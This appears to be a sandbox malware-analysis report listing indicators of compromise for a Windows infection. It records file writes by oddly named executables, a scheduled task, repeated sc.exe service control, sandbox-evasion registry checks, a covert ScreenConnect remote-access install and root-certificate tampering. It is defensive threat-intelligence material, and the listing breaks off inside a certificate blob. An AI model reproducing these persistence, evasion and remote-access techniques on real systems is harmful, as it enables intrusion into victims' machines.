File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Installer\f77a0b2.msi	msiexec.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSIA17D.tmp	msiexec.exe
File created	C:\Windows\Installer\f77a0b5.msi	msiexec.exe
File created	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\f77a0b3.ipi	msiexec.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\MSIA18E.tmp	msiexec.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\Installer\f77a0b2.msi	msiexec.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\MSIA373.tmp	msiexec.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File created	C:\Windows\Installer\f77a0b3.ipi	msiexec.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File created	C:\Windows\Tasks\rapes.job	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
948	sc.exe
1668	sc.exe
1624	sc.exe
2156	sc.exe
2708	sc.exe
2464	sc.exe
1664	sc.exe
1944	sc.exe
1504	sc.exe
3064	sc.exe
1556	sc.exe
1760	sc.exe
788	sc.exe
1684	sc.exe
2544	sc.exe
864	sc.exe
2356	sc.exe
1580	sc.exe
2224	sc.exe
1592	sc.exe
2508	sc.exe
2808	sc.exe
376	sc.exe
2992	sc.exe
2440	sc.exe
2304	sc.exe
772	sc.exe
2552	sc.exe
1288	sc.exe
2180	sc.exe
1752	sc.exe
1552	sc.exe
2208	sc.exe
1724	sc.exe
1948	sc.exe
2460	sc.exe
1564	sc.exe
1892	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cdfca381b2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WLbfHbp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7cec070324.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b66824f2c4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3bf4987416.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3bf4987416.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
540	timeout.exe
2760	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	ScreenConnect.WindowsClient.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3740	taskkill.exe
3704	taskkill.exe
908	taskkill.exe
1280	taskkill.exe
1584	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033"	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f6005